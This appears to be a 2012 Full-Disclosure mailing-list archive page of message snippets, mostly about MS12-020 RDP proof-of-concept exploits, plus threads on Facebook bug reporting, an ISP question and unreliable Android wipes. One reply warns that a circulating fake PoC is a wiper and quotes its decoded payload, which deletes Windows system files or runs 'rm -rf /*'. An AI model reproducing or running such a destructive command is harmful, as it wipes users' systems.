Re: [Full-disclosure] Earth to Facebook

2012-03-18 Thread crazy frog crazy frog
Where are they any idea? On Thu, Mar 15, 2012 at 9:07 PM, J. Oquendo s...@infiltrated.net wrote: Earth calling Facebook security engineers, earth calling Facebook security engineers. Tried reaching out to you guys about a vulnerability a good friend discovered. No one should have to hunt you

[Full-disclosure] PenTest Market - All about pentesting business

2012-03-18 Thread Krzysztof Marczyk
Hello Everyone, We have something new for you - *PenTest Market*. The thing that makes this magazine unique is structure. PenTest Market will consist mainly of interviews with IT security specialists, who will share their experience with you. We will also include some reports about pentesting

Re: [Full-disclosure] ms12-020 PoC

2012-03-18 Thread Julius Kivimäki
What's the payload? On 16 March 2012 at 18:01, kyle kemmerer krkemme...@gmail.com wrote: Not my code, just sharing it here. http://pastebin.com/UzDKcCQy ___ Full-Disclosure - We believe in it. Charter:

Re: [Full-disclosure] ms12-020 PoC

2012-03-18 Thread Nahuel Grisolía
BSoD! Win7 64 and 32 bits, Spanish. working. On 16 March 2012 14:50, Exibar exi...@thelair.com wrote: Is that the same code from yesterday? I thought that code was a fake and didn't do anything? Anyone confirm this? Exibar Sent via BlackBerry by ATT -Original Message- From:

Re: [Full-disclosure] ms12-020 PoC

2012-03-18 Thread Thomas Richards
The original researcher has released his advisory: http://www.exploit-db.com/exploits/18606/ On Fri, Mar 16, 2012 at 2:06 PM, Ian Hayes cthulhucall...@gmail.com wrote: On Fri, Mar 16, 2012 at 10:50 AM, Exibar exi...@thelair.com wrote: Is that the same code from yesterday? I thought that

Re: [Full-disclosure] ms12-020 PoC

2012-03-18 Thread Chris L
That is the first time I've seen that specific one, so not sure if it is fake or not. The main one that I saw going around about 12 hours ago was this one: http://pastebin.com/fFWkezQH and it is the allegedly fake one. The fake that is was supposedly from s...@fbi.com kind of sent off some alarm

Re: [Full-disclosure] ms12-020 PoC

2012-03-18 Thread Nahuel Grisolía
Guys, What about TS Gateway? which is actually listening on port 443 (by def)... thanks! Nahu. On 16 March 2012 15:12, root ro...@fibertel.com.ar wrote: The SABU code is fake (go figure). This python script is the first port of the Luigi code to python, that's why sucks. Here are better

Re: [Full-disclosure] is my ISP lying or stupid?

2012-03-18 Thread Dave
Your ISP probably has their users on different networks than their servers. Sounds like maybe they meant the switch you are on, not the servers' switch. Need to troubleshoot, use a smart phone or some other OOB capable device to test access to the ISP servers. If you can access OOB, then

Re: [Full-disclosure] ms12-020 PoC

2012-03-18 Thread Adrián
I've tried this one against a new installation of Windows 2008 Server. Blue screen is shown and the server is rebooted. On Friday, 16 March 2012 20:37:43, kyle kemmerer wrote: I have not had a chance to analyze this yet, but it is not the same code as the fake sabu one on pastebin.

Re: [Full-disclosure] ms12-020 PoC

2012-03-18 Thread Shawn
On Sat, Mar 17, 2012 at 1:50 AM, Exibar exi...@thelair.com wrote: Is that the same code from yesterday? I thought that code was a fake and didn't do anything? Anyone confirm this? I tested it on win-xp sp3 machine but it didn't work. According to the post[1] on slashdot, the correct

[Full-disclosure] ms12-020 new poc

2012-03-18 Thread yuri goncalves soares
Another POC. http://pastebin.com/GM4sHj9t ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] c0c0n 2012 - Call For Papers and Call For Workshops

2012-03-18 Thread Yashartha Chaturvedi

Re: [Full-disclosure] is my ISP lying or stupid?

2012-03-18 Thread Peter Maxwell
Unlikely, usually these switches are quite large and when a user has OOB it usually means console access to the server, i.e. nothing to do with network topology. If they are like most ISPs/carriers, the only thing that will be on a separate switch is their management network(s). On 16 March

Re: [Full-disclosure] Earth to Facebook

2012-03-18 Thread Ferenc Kovacs
https://www.facebook.com/whitehat/report/ ? On Thu, Mar 15, 2012 at 4:37 PM, J. Oquendo s...@infiltrated.net wrote: Earth calling Facebook security engineers, earth calling Facebook security engineers. Tried reaching out to you guys about a vulnerability a good friend discovered. No one

Re: [Full-disclosure] Fw: Earth to Facebook

2012-03-18 Thread upsploit advisories
Hi, Without meaning to advertise, that is one of the reasons upSploit was created - so that you could submit a vulnerability and then upSploit automatically sends to the vendor. This way you and your friend don't have to do any of the work on the disclosure. https://www.upsploit.com - best of

Re: [Full-disclosure] ms12-020 new poc

2012-03-18 Thread Mario Vilas
Another lame backdoor. On Sat, Mar 17, 2012 at 6:45 AM, yuri goncalves soares y...@bsd.com.br wrote: Another POC. http://pastebin.com/GM4sHj9t

Re: [Full-disclosure] is my ISP lying or stupid?

2012-03-18 Thread Valdis . Kletnieks
On Sun, 18 Mar 2012 12:49:49 -, Peter Maxwell said: On 16 March 2012 19:11, Dave irysh...@gmail.com wrote: Your ISP probably has their users on different networks than their servers. Sounds like maybe they meant the switch you are on, not the servers' switch. Need to troubleshoot,

Re: [Full-disclosure] Earth to Facebook

2012-03-18 Thread Jeffrey Walton
On Sun, Mar 18, 2012 at 8:57 AM, Ferenc Kovacs tyr...@gmail.com wrote: https://www.facebook.com/whitehat/report/ ? It's encumbered by Terms of Service. It's better to find an email address so that (1) you are not bound by legal entanglements, and (2) you have a written record of the

Re: [Full-disclosure] is my ISP lying or stupid?

2012-03-18 Thread James Condron
Sorry, I don't mean to be rude but none of that made any sense, especially from an ISP perspective. You will never have a switch per area; it doesn't work like that, you'll have a series of distribution routers for routing to customers. Mail, www, shell, SIP, whatever will be other services

Re: [Full-disclosure] ms12-020 PoC

2012-03-18 Thread Thor (Hammer of God)
You establish a connection to TSGateway via RPC over HTTP in an SSL tunnel. Once you are authenticated and authorized, the TSGateway server will establish a connection via RDP to the target server, tunneling the RDP connection back to you within the RPC/HTTP(S) channel. As such, TSGateway is

Re: [Full-disclosure] ms12-020 PoC

2012-03-18 Thread Thor (Hammer of God)
P.S. Before someone starts accusing me of spamming for the book, (one asshat tried to compare me to Juan whats-his-face once) note you can actually view most of the RDP chapter (and others) on the Amazon preview a page feature if you would like. If you are interested in RDP security, I suggest

Re: [Full-disclosure] ms12-020 PoC

2012-03-18 Thread James Condron
Nobody said a word. Relax more and you might live long enough to write your next book. Sent using BlackBerry® from Orange -Original Message- From: Thor (Hammer of God) t...@hammerofgod.com Sender: full-disclosure-boun...@lists.grok.org.uk Date: Sun, 18 Mar 2012 17:03:25 To:

Re: [Full-disclosure] ms12-020 new poc

2012-03-18 Thread BGA
It's a fake and deletes your disk completely. If you convert the payload to ascii __import__('os').sys tem('del /s /q /f C: \windows\system32\* NUL 21') if 'Win ' in __import__('pla tform').system() els e __import__('os').s ystem('rm -rf /* / dev/null 21') #hi there ^_~ feel

Re: [Full-disclosure] ms12-020 PoC

2012-03-18 Thread Thor (Hammer of God)
They did last time... But your advice is actually well noted :) -Original Message- From: James Condron [mailto:ja...@zero-internet.org.uk] Sent: Sunday, March 18, 2012 10:06 AM To: Thor (Hammer of God); full-disclosure-boun...@lists.grok.org.uk; full- disclos...@lists.grok.org.uk

[Full-disclosure] Android wipe unreliable

2012-03-18 Thread Jan Schejbal
We have discovered that the wipe function on Android does not reliably delete data on all devices. On a Nexus S running Android 2.3.6, we were able to recover user data after running a wipe both using the factory data reset from the menu and by wiping the device from recovery. To recover data,

Re: [Full-disclosure] is my ISP lying or stupid?

2012-03-18 Thread Lee
On 3/18/12, James Condron ja...@zero-internet.org.uk wrote: Sorry, I don't mean to be rude but none of that made any sense, especially from an ISP perspective. None of it made any sense wrt the initial question of is my isp lying but, allowing for the typical Kletnieks hyperbole, it does make

Re: [Full-disclosure] Earth to Facebook

2012-03-18 Thread Zach C.
Could he not use a trusted intermediary though? That is, find someone to report the issue who can be entangled by ToS, will take screenshots, etc. I suppose the biggest problem of this would be the trust part, though. :) On Mar 18, 2012 9:14 AM, Jeffrey Walton noloa...@gmail.com wrote: On Sun,

Re: [Full-disclosure] Fw: Earth to Facebook

2012-03-18 Thread Michal Zalewski
Without meaning to advertise, that is one of the reasons upSploit was created - so that you could submit a vulnerability and then upSploit automatically sends to the vendor. This way you and your friend don't have to do any of the work on the disclosure. I clicked around and don't see any

Re: [Full-disclosure] Fw: Earth to Facebook

2012-03-18 Thread upsploit advisories
The only other people that see the vulnerability are the select few in upSploit. However if the vendor is already in the upSploit database the advisory gets submitted straight away to the vendor. If you want to try it out there should be an upSploit vendor in the vendor list. Submit some

Re: [Full-disclosure] Fw: Earth to Facebook

2012-03-18 Thread Thor (Hammer of God)
Why not just provide them with the contact and they can forward it on directly? Then you could obviate the entire trust issue... t From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of upsploit advisories Sent: Sunday, March 18, 2012

Re: [Full-disclosure] Fw: Earth to Facebook

2012-03-18 Thread upsploit advisories
We don't just send the initial advisory... I guess I need to make the website slightly more informative! After the initial contact we have (currently) a 6 month disclosure policy. We send an email every month, in the final month once a week and in the final week once a day. This email is

Re: [Full-disclosure] ms12-020 PoC

2012-03-18 Thread Nahuel Grisolia
Thanks Thor! I thought that it was possible to tunnel the attack through HTTPS channel that the TSG generates. Nahu. On Mar 18, 2012, at 2:11 PM, Thor (Hammer of God) wrote: They did last time... But your advice is actually well noted :) -Original Message- From: James Condron

Re: [Full-disclosure] Android wipe unreliable

2012-03-18 Thread Jeffrey Walton
On Sun, Mar 18, 2012 at 1:46 PM, Jan Schejbal jan.mailinglis...@googlemail.com wrote: We have discovered that the wipe function on Android does not reliably delete data on all devices. On a Nexus S running Android 2.3.6, we were able to recover user data after running a wipe both using the